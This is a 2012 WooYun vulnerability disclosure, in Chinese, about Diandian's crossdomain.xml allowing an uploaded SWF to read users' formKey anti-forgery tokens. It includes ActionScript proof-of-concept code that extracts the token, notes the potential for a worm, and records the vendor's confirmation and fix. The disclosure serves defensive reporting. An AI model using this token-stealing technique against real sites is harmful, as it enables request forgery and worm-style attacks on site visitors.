当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09056

漏洞标题:点点网formKey泄露

相关厂商:点点网

漏洞作者: p.z

提交时间:2012-06-30 10:29

修复时间:2012-08-14 10:30

公开时间:2012-08-14 10:30

漏洞类型:应用配置错误

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-30: 细节已通知厂商并且等待厂商处理中
2012-07-01: 厂商已经确认,细节仅向厂商公开
2012-07-11: 细节向核心白帽子及相关领域专家公开
2012-07-21: 细节向普通白帽子公开
2012-07-31: 细节向实习白帽子公开
2012-08-14: 细节向公众公开

简要描述:

详细说明:

模版静态资源上传页面(http://www.diandian.com/upload/asset)和Flash跨域通信的配置文件中(http://www.diandain.com/crossdomain.xml)允许的域名相同,只需上传一个SWF,就可以读到formKey了。把这SWF嵌入到blog页面中,读到访客的formKey,调用externalInterface把值给输到JS里,又能worm了吧。

漏洞证明:

http://x.libdd.com/farm1/f15341/7cef03a1/diandian.swf

var result_txt = new TextField();
result_txt.x = 0;
result_txt.y = 0;
result_txt.height = 22;
result_txt.width = 200;
addChild(result_txt);
var targetURL:String="http://www.diandian.com/home";
var request:URLRequest=new URLRequest(targetURL);
request.method=URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event){
  var formKey:String = loader.data;
  formKey = formKey.split("window.DDformKey = '")[1].split("'")[0]
  result_txt.text = formKey
}
loader.load(request)


效果就这样:

修复方案:

改配置文件?改存储静态文件的域名?

版权声明:转载请注明来源 p.z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2012-07-01 00:54

厂商回复:

再一次感谢p.z帮助发现一个高危漏洞.
随着业务发展, 原来完全由点点控制的域名下也开始有用户脚本. 当时权限放的太开, 考虑不周.
线上目前已经修复.

最新状态:

暂无